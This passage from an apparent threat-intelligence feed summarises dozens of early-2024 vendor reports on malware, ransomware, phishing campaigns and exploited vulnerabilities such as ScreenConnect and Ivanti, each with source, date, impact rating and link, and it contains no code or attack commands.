- LOW
- Summary:
- A new variant of the SupermanMiner cryptocurrency mining malware has been active for over 2 years, using techniques like vulnerability exploitation, SSH brute force, web shell injection and others to infect systems. It has evolved into multiple new branches, with heavy obfuscation and complex persistence mechanisms, posing a serious threat. Users should apply security patches, use strong passwords, and limit external access to prevent infection.
Source:
https://cert.360.cn/warning/detail?id=65deee7fc09f255b91b17e0f
—
- Intel Source:
- Fortinet
- Intel Name:
- CHAVECLOAKS_Targeting_Brazilians_via_Malicious_PDFs
- Date of Scan:
- 2024-03-05
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have found CHAVECLOAK, a high-severity Trojan that targeting Brazilian bank customers. The malware targets Windows devices and gains access to online banking services, taking financial data and banking credentials with it.
Source:
https://www.fortinet.com/blog/threat-research/banking-trojan-chavecloak-targets-brazil
—
- Intel Source:
- ASEC
- Intel Name:
- WogRAT_Malware_Exploiting_aNotepad
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found that backdoor malware is distributed using the free online notepad tool aNotepad. Both the PE format, which targets Windows systems, and the ELF format, which targets Linux systems, are supported by said malware. The malware is categorized as WogRAT since the threat actor uses the string “WingOfGod” when creating it.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Remcos_RAT_and_Agent_Tesla_Deployed_by_Stego_Campaign
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma have discovered a way to get around standard email security safeguards in a Microsoft Office document by using template injection. Opening the document initiates a multi-stage attack that includes the deployment of the malware known as “Agent Tesla” and the Remcos Remote Access Trojan (RAT), as well as the download and execution of scripts.
—
- Intel Source:
- Cleafy
- Intel Name:
- A_recent_Copybara_fraud_campaign
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- The article discusses the rising threat of On-Device Fraud (ODF) in the banking sector, which involves fraudulent activities initiated directly on the victim’s device. It focuses on a recent Copybara fraud campaign and explains the use of remote control capabilities by malware to execute ODF scenarios. The article also provides an overview of phishing panels and the Copybara botnet’s associated C2 web panel. It describes the functionalities of the panel, including the ability to remotely control infected devices, steal credentials, and send fake push notifications. The article concludes by emphasizing the need for collaboration and innovation in combating ODF and other forms of banking fraud.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_use_of_spyware_Predator_poses_significant_risks
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- Recorded Future’s Insikt Group has observed new activity related to the operators of Predator, a mercenary mobile spyware. Spyware like Predator poses significant privacy, legality, and physical safety risks, especially when used outside serious crime and counterterrorism contexts. The Insikt Group’s research found out about a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA577_Cyber_Threat_Unmasked
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- Proofpoint Researchers Uncover New Attack Chain by Cyber Threat Actor TA577, Focused on Uncommon NT LAN Manager (NTLM) Authentication Information Theft. Two Campaigns Detected on 26 and 27 February 2024, Targeting Hundreds of Global Organizations through Thread Hijacking with Zipped HTML Attachments.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Wave_of_SocGholish_Infections
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- The article discusses a new wave of SocGholish malware infections that are targeting WordPress websites. These malicious plugins are being uploaded to compromised websites and contain code that injects SocGholish payloads onto the site. The article provides examples of different plugins that have been modified to include this code and explains how the code is executed. It also mentions the TDS domains that are being used to host the SocGholish scripts and the recent registration dates of these domains. The article emphasizes the responsibility of website owners to keep their websites secure and provides tips for website owners to prevent the distribution of malware. It also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article also discusses the similarities between criminal organizations behind cyber attacks and regular IT companies. It highlights the importance of website visitors being vigilant and avoiding clicking on suspicious links. The article also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article concludes by emphasizing the importance of protecting websites from these types of attacks and provides information on the techniques used by attackers, such as “domain shadowing” and gaining access through compromised credentials.
—
- Intel Source:
- Lookout
- Intel Name:
- Advanced_Phishing_Kit_Targeting_Cryptocurrency_Platforms_and_FCC
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- Lookout researchers have identified an innovative phishing kit employing unique strategies to target both cryptocurrency platforms and the Federal Communications Commission (FCC) through mobile devices. Modeled after the techniques used by groups like Scattered Spider, this kit allows attackers to replicate single sign-on (SSO) pages. Subsequently, they employ a blend of email, SMS, and voice phishing to deceive targets into divulging usernames, passwords, password reset URLs, and even photo IDs from numerous victims, predominantly in the United States.
Source:
https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit
—
- Intel Source:
- Trend Micro
- Intel Name:
- A_Multistage_Ransomware_Attack_Using_RA_World
- Date of Scan:
- 2024-03-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro have discovered a multi-stage attack known as RA World, which is aimed against multiple healthcare organizations in the Latin American region. The attack’s goal is to maximize the group’s operational impact and success.
Source:
https://www.trendmicro.com/en_us/research/24/c/multistage-ra-world-ransomware.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Airbnb_scam
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- The scammers send people emails that claim to be from Tripadvisor with some links, but more alarm bells were triggered when the sender email showed up as [email protected] — not exactly the email address you’d expect from Tripadvisor itself. The scammer hoped people would click on the booking button on the fake Tripadvisor site. If they had done, they would have seen a prompt to register with ‘Tripadvisor’.
—
- Intel Source:
- Sonatype
- Intel Name:
- The_spread_of_Bladeroid_crypto_stealer_thru_npm_packages
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Sonatype has identified multiple open source packages named sniperv1, and sniperv2, among others that infect npm developers with a Windows info-stealer and crypto-stealer called ‘Bladeroid.’ The info-stealer can be seen peeking into a user’s browser cookies and local storage data and attempting to steal saved (auto-fill) form data. The info-stealer can be seen peeking into a user’s browser cookies and local storage data and attempting to steal saved (auto-fill) form data.
Source:
https://blog.sonatype.com/npm-packages-caught-spreading-bladeroid-info-stealer
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_DarkGate_Model_For_Malware_Delivery_and_Persistence
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have examined a typical phishing PDF, which resulted in the delivery of a far more dubious MSI signed with a legitimate code signing certificate and having an unexpectedly low signature-based detection rate on VirusTotal because of the utilization of multiple layered stages.
—
- Intel Source:
- CISA
- Intel Name:
- Active_Exploitation_of_Ivanti_Gateway_Vulnerabilities
- Date of Scan:
- 2024-03-01
- Impact:
- MEDIUM
- Summary:
- The Integrity Checker Tool (ICT) can be tricked into giving the impression of false security, according to a new cybersecurity advice from the Five Eyes intelligence alliance. Cyber threat actors are taking advantage of known security holes in the Ivanti Connect Secure and Ivanti Policy Secure gateways. Despite doing factory resets, a cyber threat actor may still be able to obtain root-level persistence, and Ivanti ICT is insufficient to identify penetration. Since January 10, 2024, Ivanti has published five security flaws affecting their products. Of those, four are now being actively exploited by various threat actors to spread malware.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Bifrost_New_Tactics_of_Domain_Deception
- Date of Scan:
- 2024-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have discovered a novel Linux version of Bifrost, also known as Bifrose, which demonstrates a creative way to avoid discovery. It makes use of a phony domain that imitates the official VMware domain. The goal of the most recent version of Bifrost is to sneak past security safeguards and infiltrate specific systems.
Source:
https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/
—
- Intel Source:
- The Hackers news, Phylum
- Intel Name:
- North_Korean_threat_actors_attacking_developers_with_suspicious_npm_packages
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Phylum in their blog explained the deep details of an npm package pretending as a code profiler that installs several malicious scripts including a cryptocurrency and credential stealer. And the hacker tried to hide the malicious code in a test file,
Source:
https://thehackernews.com/2024/02/north-korean-hackers-targeting.html
https://blog.phylum.io/smuggling-malware-in-test-code/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Exploring_Confluence_CVE_2022_26134
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Researchers from ISC SANS have added daemonlogger to capture packets and Arkime to view the packets that my DShield sensor captured. They noticed that, up until now, this activity had only gone to TCP/8090, which is base64 encoded and contains URLs. On February 12, 2024, the DShield sensor began recording this behavior as it came in from different IPs in different places.
Source:
https://isc.sans.edu/diary/Scanning+for+Confluence+CVE202226134/30704/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_Continues_to_Drop_Rhadamanthys
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- The first time the Rhadamanthys stealer was spotted in public, it was transmitted through malicious advertisements just over a year ago. Malwarebytes researchers have seen a persistence of software download-related malvertising chains in 2023.
—
- Intel Source:
- Hunt
- Intel Name:
- The_Lazarus_group_targets_blockchain_community
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor.
Source:
https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Escalation_of_Web_API_Cyber_Attacks_this_year
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- The landscape of cyber security is continuously evolving, with Web Application Programming Interfaces (APIs) becoming a focal point for cyber attackers. APIs, which facilitate communication between different software applications, present a broader attack surface than traditional web applications. This exposure is due to the inherent vulnerabilities within Web APIs that can lead to authentication bypasses, unauthorized data access, and a range of malicious activities.
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- Spread_Mac_Malware_thru_Calendar_Meeting_Links
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- Malicious hackers are attacking customers in cryptocurrency in attacks that start with a link added to the target’s calendar at Calendly, an application for scheduling appointments and meetings. The attackers duplicated established cryptocurrency investors and asked to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.
Source:
https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/
—
- Intel Source:
- Hunter
- Intel Name:
- Affiliate_TTPs_For_BlackCat_Ransomware
- Date of Scan:
- 2024-02-29
- Impact:
- HIGH
- Summary:
- In less than three minutes, the threat actor was able to download a copy of the ransomware executable to the endpoint through the second identified ScreenConnect instance. In response to the file being quarantined, the threat actor temporarily disabled Windows Defender before downloading the executable file once more and successfully launching it.
Source:
https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
—
- Intel Source:
- CISA
- Intel Name:
- The_Phobos_ransomware_variants
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- The FBI, the CISA, and MS-ISAC are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
—
- Intel Source:
- Zscaler
- Intel Name:
- SPIKEDWINE_With_WINELOADER_Targets_European_Diplomats
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler have found a suspicious PDF file that was posted to VirusTotal on January 30, 2024, from Latvia. Disguised as a letter from the Indian ambassador, this PDF file invites ambassadors to a wine tasting in February 2024. Additionally, the PDF contained a link to a fictitious questionnaire that starts the infection chain by sending users to a malicious ZIP archive housed on a compromised website. They found another similar PDF file uploaded to VirusTotal from Latvia in July 2023 after conducting additional threat research.
Source:
https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
—
- Intel Source:
- McAfee Labs
- Intel Name:
- GUloader_Encryption_Strategies_Unmasked
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- McAfee researchers have discovered that GUloader is now exposed, decrypting the threat posed by malicious SVG files. GUloader utilizes dynamic structural changes, employing polymorphic code and encryption to effectively hide from antivirus software and intrusion detection systems.
—
- Intel Source:
- Infloblox
- Intel Name:
- Savvy_Seahorse_tricks_victims_to_fake_investment_platforms
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia. This actor uses Facebook ads to lure users into their websites and ultimately enroll in fake investment platforms. The campaign themes often involve spoofing well-known companies like Tesla, Facebook/Meta, and Imperial Oil, among others.
—
- Intel Source:
- IC3
- Intel Name:
- MooBot_Threat_Detected_on_Ubiquiti_EdgeRouters
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember. The MooBot botnet is being utilized by APT28, a threat actor associated with Russia, to enable clandestine cyber operations and disseminate personalized malware for subsequent exploitation. Connected to the Russian Federation’s Main Directorate of the General Staff (GRU), APT28 has been operational since at least 2007.
—
- Intel Source:
- Bitdefender
- Intel Name:
- New_Variant_of_Atomic_Stealer_in_the_wild
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- During some investigations, the Bitdefender team was able to isolate multiple suspicious and undetected macOS disk image files that were surprisingly small for files of this kind (1.3 MB per file). The new variant drops and uses a Python script to stay covert. The malware also shares a similar code with the RustDoor backdoor.
—
- Intel Source:
- JPCert
- Intel Name:
- Lazarus_new_malicious_PyPI_packages
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python package repository
Source:
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html
—
- Intel Source:
- Bitdefender
- Intel Name:
- Cactus_ransomware_attack_on_corporate_networks
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Bitdefender Labs recently did an investigation that led to the predictions of the growing risk of ransomware attacks. This attack was orchestrated by the threat actor CACTUS, who began by exploiting a software vulnerability less than 24 hours after its initial disclosure. Bitdefender sees it as a commonly known Remote Code Execution (RCE) proof-of-concept (POC) that remains unaddressed for over 24 hours. They suspect that the systems have been compromised with a web shell.
—
- Intel Source:
- CISA
- Intel Name:
- The_ALPHV_Blackcat_ransomware_updates
- Date of Scan:
- 2024-02-28
- Impact:
- HIGH
- Summary:
- The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a
—
- Intel Source:
- Mandiant
- Intel Name:
- Ivanti_Connect_Secure_VPN_Vulnerabilities_Exploited_by_China_Linked_Threat_Actors
- Date of Scan:
- 2024-02-28
- Impact:
- LOW
- Summary:
- This article explores the investigation into the exploitation and persistence attempts of Ivanti Connect Secure VPN vulnerabilities in a series called “Cutting Edge, Part 3.” Additionally, Mandiant has identified UNC5325 employing living-off-the-land techniques and deploying new malware like LITTLELAMB to enhance evasion of detection.
Source:
https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence
—
- Intel Source:
- Mandiant
- Intel Name:
- Iranian_Threat_Actor_UNC1549_Targets_Israeli_and_Middle_East_Aerospace_and_Defense_Sectors
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant shared their blog post about suspected Iran espionage activity attacking the aerospace, aviation, and defense industries in Middle Eastern countries, including Israel and the United Arab Emirates (UAE) and possibly Turkey, India, and Albania. Mandiant links this activity with some confidence to the Iranian actor UNC1549, which overlaps with Tortoiseshell—a threat actor that has been publicly linked to Iran’s Islamic Revolutionary Guard Corps (IRGC).
Source:
https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east
—
- Intel Source:
- PaloAlto
- Intel Name:
- Possible_Imposter_Ransomware_Impersonating_LOCKBIT_4
- Date of Scan:
- 2024-02-28
- Impact:
- HIGH
- Summary:
- There is a lot of interest in LockBit 4.0 now that it is back online following its disruption in February 2024. Similar to others, PaloAlto researchers have discovered potential imposters using the Lockbit 4.0 identity on VirusTotal.
Source:
https://twitter.com/Unit42_Intel/status/1762570867291070880
—
- Intel Source:
- Palo Alto
- Intel Name:
- Exploring_DLL_Hijacking
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Unit 42 Palo Alto explained in their article how threat actors use DLL hijacking in malware attacks. It also shares ideas for how to better detect DLL hijacking and best practices on how to reduce the risk of attack. Dynamic-link library (DLL) hijacking is one of the oldest techniques that both threat actors and offensive security professionals continue to use today.
Source:
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/#post-132679-_ydqdbjg0dngh
—
- Intel Source:
- Huntress
- Intel Name:
- Adversaries_Exploiting_ScreenConnect_Vulnerability_SlashAndGrab
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Huntress has observed a surge in threat actor activity exploiting the ScreenConnect vulnerability dubbed “SlashAndGrab.” This article details various post-exploitation tradecraft employed by adversaries, including deploying ransomware (e.g., LockBit), running cryptocurrency miners, installing additional remote access tools (e.g., Simple Help, SSH, Google Chrome Remote Desktop), dropping Cobalt Strike beacons, and establishing persistence through user creation and reverse shell techniques. The article emphasizes the need for continued vigilance and highlights the importance of a proactive and experienced security approach to thwart adversaries.
—
- Intel Source:
- The DFIR Report
- Intel Name:
- The_Gootloader_Tale_Goes_On
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have discovered an intrusion in February 2023. The intrusion was caused by a user downloading and running a file from an SEO-poisoned search result, which resulted in a Gootloader infection. By using SystemBC to tunnel RDP access into the network, the threat actor was able to compromise backup servers, domain controllers, and other important systems.
Source:
https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/
—
- Intel Source:
- Any.Run
- Intel Name:
- Examining_DCRat_in_Depth
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Initially released in 2018, DCrat, also referred to as Dark Crystal RAT, is a remote access trojan (RAT). This malware is modular, meaning it may be altered to carry out various functions. For example, it can take over Steam and Telegram accounts, steal passwords, and get information from cryptocurrency wallets. DCrat can be distributed by attackers in a number of ways, although phishing email operations are the most popular.
—
- Intel Source:
- Bitsight
- Intel Name:
- InstallsKey_PPI_Service_Malware
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- A new string encryption method and an alternate communication protocol have been added to PrivateLoader, a popular malware downloader. In addition, it is now downloading a duplicate of itself in addition to its other payloads. The commercial packer VMProtect is used to pack recent samples, which makes them more difficult to decipher and reverse engineer.
Source:
https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service
—
- Intel Source:
- Elastic
- Intel Name:
- The_observed_new_PIKABOT_campaigns
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Elastic Security Labs discovered updated new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.
Source:
https://www.elastic.co/security-labs/pikabot-i-choose-you
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Abyss_Locker_ransomware_roundup_report
- Date of Scan:
- 2024-02-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs monitors and collects data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. This time they reported that the ransomware roundup covers the Abyss Locker (AbyssLocker) ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker
—
- Intel Source:
- Morphisec
- Intel Name:
- New_Version_of_IDAT_Loader_Pushes_Remcos_RAT_with_Steganography
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Researchers at Morphisec Threat Labs have found several signs of attacks that led to threat actor UAC-0184. The infamous IDAT loader that sent the Remcos Remote Access Trojan (RAT) to a Ukrainian organization with headquarters in Finland is clarified by this finding.
Source:
https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga
—
- Intel Source:
- Forcepoint
- Intel Name:
- Agent_Tesla_malware_targets_travel_industry
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Forcepoint analysts analyzed one of the Agent Tesla similar campaigns which is delivered via email as a PDF attachment and ends up downloading a RAT leaving the system infected. The email was an example of scamming and brand impersonation where the sender is seeking a refund of a reservation made at Booking.com and asking the recipient to check the attached PDF for the card statement.
Source:
https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Scripts_Exploit_Telegram_for_User_Information_Theft
- Date of Scan:
- 2024-02-27
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has identified a surge in phishing scripts utilizing Telegram for the indiscriminate distribution of malicious content, often themed around remittances and receipts. These sophisticated scripts, unlike their predecessors, employ obfuscation techniques to evade detection. Upon interaction, users are prompted to enter a password, enabling threat actors to steal sensitive information, including email addresses and passwords. The stolen data is then transmitted to the attackers via the Telegram API. This method of leveraging Telegram for information theft is becoming increasingly prevalent, emphasizing the importance of vigilance against suspicious files and websites.
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Dark_Web_Profile_of_Patchwork_APT
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- The Patchwork APT group is an Indian cyber espionage group that was discovered in December 2015, however it is likely that it has been operating since 2009. Targeting high-profile organizations in South and Southeast Asia, but increasingly expanding to other regions, it primarily targets defense, diplomatic, and government agencies. Patchwork is a prominent threat in the cyber threat landscape because it uses a variety of specialized tools and techniques for espionage, including spear phishing and watering hole attacks.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Black_Basta_Exploiting_ScreenConnect_Vulnerabilities
- Date of Scan:
- 2024-02-27
- Impact:
- HIGH
- Summary:
- Researchers from TrendMicro have thoroughly examined the most recent ScreenConnect vulnerabilities. They also talk about how the data led them to identify threat actor groups that are actively using CVE-2024-1708 and CVE-2024-1709, such as the Black Basta and Bl00dy Ransomware gangs.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- TimbreStealer_campaign_targets_Mexican_users
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.” This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques, and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
Source:
https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_new_remote_access_trojan_Xeno_RAT
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Cyfirma provided deep analyses on the proliferation of Xeno RAT malware, crafted with advanced functionalities, conveniently accessible at no cost on GitHub. Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware. A threat actor customized its settings and disseminated it via the Discord CDN.
Source:
https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/
—
- Intel Source:
- Trendmicro
- Intel Name:
- Dissecting_Earth_Luscas_Espionage_Campaign_Leveraging_Geopolitical_Lures
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Trend Micro’s investigation has uncovered a cyber espionage campaign by Earth Lusca, a China-linked threat actor, exploiting Chinese-Taiwanese tensions. Active around the Taiwanese national elections in late 2023 to early 2024, the campaign used spear-phishing with geopolitical lures to deliver a complex, multi-stage infection process, ultimately deploying Cobalt Strike payloads. Further analysis suggests a link between Earth Lusca and the Chinese company I-Soon, indicating a broader network of cyber espionage tied to Chinese interests. This campaign highlights the ongoing risks of state-linked cyber operations targeting politically sensitive entities.
—
- Intel Source:
- Stratosphereips Blog
- Intel Name:
- Analysis_of_the_PyRation_family_malware
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Stratosphereips researchers wrote the blog about the technical analysis of malware they link to the variant of the “PyRation” family. This malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows.
—
- Intel Source:
- Phylum
- Intel Name:
- NovaStealer_Deployer
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- The article discusses a recent discovery by the Phylum Research Team of a dormant PyPI package, django-log-tracker, that was updated to deploy the NovaSentinel stealer. The update included malicious code, indicating a calculated strategy by an attacker or a compromise of the PyPI account. The malware was found to be a form of steal-everything-you-can-find, designed to steal sensitive information. The section also highlights the risks of supply-chain attacks through compromised PyPI accounts and urges developers to be cautious when using open-source software.
Source:
https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/
—
- Intel Source:
- ASEC
- Intel Name:
- Uncovering_Nood_RAT_Persistent_Linux_Threat
- Date of Scan:
- 2024-02-26
- Impact:
- MEDIUM
- Summary:
- The AhnLab Security Intelligence Center (ASEC) has reported the discovery and ongoing analysis of Nood RAT, a Linux-targeting malware variant of the widely known Gh0st RAT. Originating from a lineage of malware with open-source roots primarily utilized by Chinese-speaking threat actors, Nood RAT has been actively used in cyber attacks since 2018, exploiting vulnerabilities across various systems. This malware exhibits sophisticated capabilities, including masquerading as legitimate processes, encrypted communication with command and control (C&C) servers, and executing malicious activities such as file manipulation and proxy usage. Despite its simplicity, Nood RAT’s evasion techniques and the breadth of its deployment highlight the critical need for up-to-date system security and vigilant monitoring to combat such threats.
—
- Intel Source:
- NCC Group
- Intel Name:
- Unmasking_Lorenz_Ransomware
- Date of Scan:
- 2024-02-26
- Impact:
- MEDIUM
- Summary:
- The article discusses the evolving tactics of the ransomware group Lorenz, which has been targeting small to medium businesses globally. The group has recently adopted double-extortion tactics and made changes to their encryption methods and file names. They also use scheduled tasks and local admin accounts for persistence. The article provides indicators of compromise and stresses the need for continuous monitoring to stay protected against ransomware threats.
—
- Intel Source:
- Talos
- Intel Name:
- TikTok_Misinformation_Combat
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- The article discusses TikTok’s efforts to address misinformation and disinformation on their platform, emphasizing that this is a global issue. It also mentions the use of Google Cloud Run for distributing malware and provides updates on cybersecurity news and events.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-feb-22-2024/
—
- Intel Source:
- Esentire
- Intel Name:
- Blind_Eagle_Targets_Manufacturing_with_Advanced_Crypters_and_Payloads
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Blind Eagle threat actors have been observed targeting the manufacturing sector, distributing malicious VBS files through phishing emails containing links to RAR and BZ2 archives. They observed Blind Eagle threat actor(s) targeting Spanish-speaking users in the manufacturing industry based in North America.
Source:
https://www.esentire.com/blog/blind-eagles-north-american-journey
—
- Intel Source:
- CERT-UA
- Intel Name:
- Targeted_Cyber_Attack_Against_Ukrainian_Defense_Forces_Thwarted
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Ukrainian cybersecurity teams thwarted a targeted cyber attack against the Ukrainian Defense Forces, delivered via a malicious Excel document spread through Signal messenger. The attack involved a complex chain of actions including the execution of a malicious PowerShell script, COOKBOX, designed to compromise and control affected systems. The attack, part of ongoing efforts since autumn 2023, exploited systems lacking basic security measures. The response highlighted the critical role of advanced security technologies like EDR in preventing such breaches and underscored the necessity for immediate implementation of comprehensive security policies to protect against sophisticated cyber threats.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Critical_ConnectWise_ScreenConnect_Authentication_Bypass
- Date of Scan:
- 2024-02-26
- Impact:
- HIGH
- Summary:
- On February 19, 2024, ConnectWise released a security patch addressing two vulnerabilities in the ScreenConnect software, potentially leading to Remote Code Execution (RCE). These vulnerabilities, identified as CVE-2024-1709 and CVE-2024-1708, allow attackers to bypass authentication and perform path traversal, respectively, enabling unauthorized access and administrative privilege escalation.
—
- Intel Source:
- Uptycs
- Intel Name:
- 8220_Group_Gang_Launches_Cryptomining_Campaign
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new cryptomining campaign conducted by the 8220 Group, targeting both Linux and Windows systems. This recent campaign stands out due to the use of Windows PowerShell for fileless execution, resulting in the deployment of a cryptominer. What distinguishes this campaign is its adoption of unique techniques, such as DLL sideloading, User Account Control (UAC) bypass, and modifications to AMSIscanBuffer and ETWEventWrite. These tactics represent a novel approach, highlighting the group’s innovative methods to enhance stealth and evasion, setting it apart from previous incidents. Notably, the Linux campaign showed no significant alterations in its tactics.
Source:
https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_abuses_a_valid_certificate_to_distribute_TrollAgent
- Date of Scan:
- 2024-02-23
- Impact:
- MEDIUM
- Summary:
- A malicious TrollAgent malware was found to be downloaded when attempting to install security software from a South Korean construction association website. The malware can steal information and receive commands from attackers. Users should keep antivirus software updated to prevent infection.
—
- Intel Source:
- Esentire
- Intel Name:
- The_Pikabot_rising_threat
- Date of Scan:
- 2024-02-23
- Impact:
- MEDIUM
- Summary:
